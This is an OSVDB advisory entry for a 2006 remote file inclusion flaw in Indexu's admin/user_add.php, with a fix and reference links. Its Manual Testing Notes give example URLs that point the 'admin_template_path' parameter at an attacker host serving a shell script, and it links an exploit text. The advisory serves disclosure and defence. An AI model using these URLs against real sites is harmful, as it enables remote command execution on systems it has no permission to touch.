Indexu admin/user_add.php Multiple Variable Remote File Inclusion

2006-06-16T22:20:52
ID OSVDB:28393
Type osvdb
Reporter Khamaïleon(Hackmaileon@hotmail.com), King-Hacker(King-Hacker@hotmail.fr)
Modified 2006-06-16T22:20:52

Description

Vulnerability Description

Indexu contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the admin/user_add.php script not properly sanitizing user input supplied to the 'theme_path' and 'admin_template_path' variables. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

Solution Description

Upgrade to version 5.1.1 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

Short Description

Indexu contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the admin/user_add.php script not properly sanitizing user input supplied to the 'theme_path' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

Manual Testing Notes

http://[target]/[directory_of_INDEXU]/admin/user_add.php=[attacker]/[shell].txt?

http://[target]/indexu/admin/user_add.php?admin_template_path=http://evilcode.txt?

References:

Vendor URL: http://www.nicecoder.com/ Vendor URL: http://www.nicecoder.com/idx_main.php Security Tracker: 1016330 Security Tracker: 1016331 Secunia Advisory ID:18752 Related OSVDB ID: 28385 Related OSVDB ID: 28396 Related OSVDB ID: 28398 Related OSVDB ID: 28399 Related OSVDB ID: 28390 Related OSVDB ID: 28395 Related OSVDB ID: 28397 Related OSVDB ID: 28403 Related OSVDB ID: 28386 Related OSVDB ID: 28389 Related OSVDB ID: 28392 Related OSVDB ID: 28394 Related OSVDB ID: 28400 Related OSVDB ID: 28401 Related OSVDB ID: 28384 Related OSVDB ID: 28387 Related OSVDB ID: 28388 Related OSVDB ID: 28391 Related OSVDB ID: 28402 Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-06/0318.html ISS X-Force ID: 27263 ISS X-Force ID: 27262 Generic Exploit URL: http://ftp.kep.online.fr/Indexu_5.0.1_File_Inclusion_Exploit-by_King-Hacker_and-Khamaileon.txt CVE-2006-7017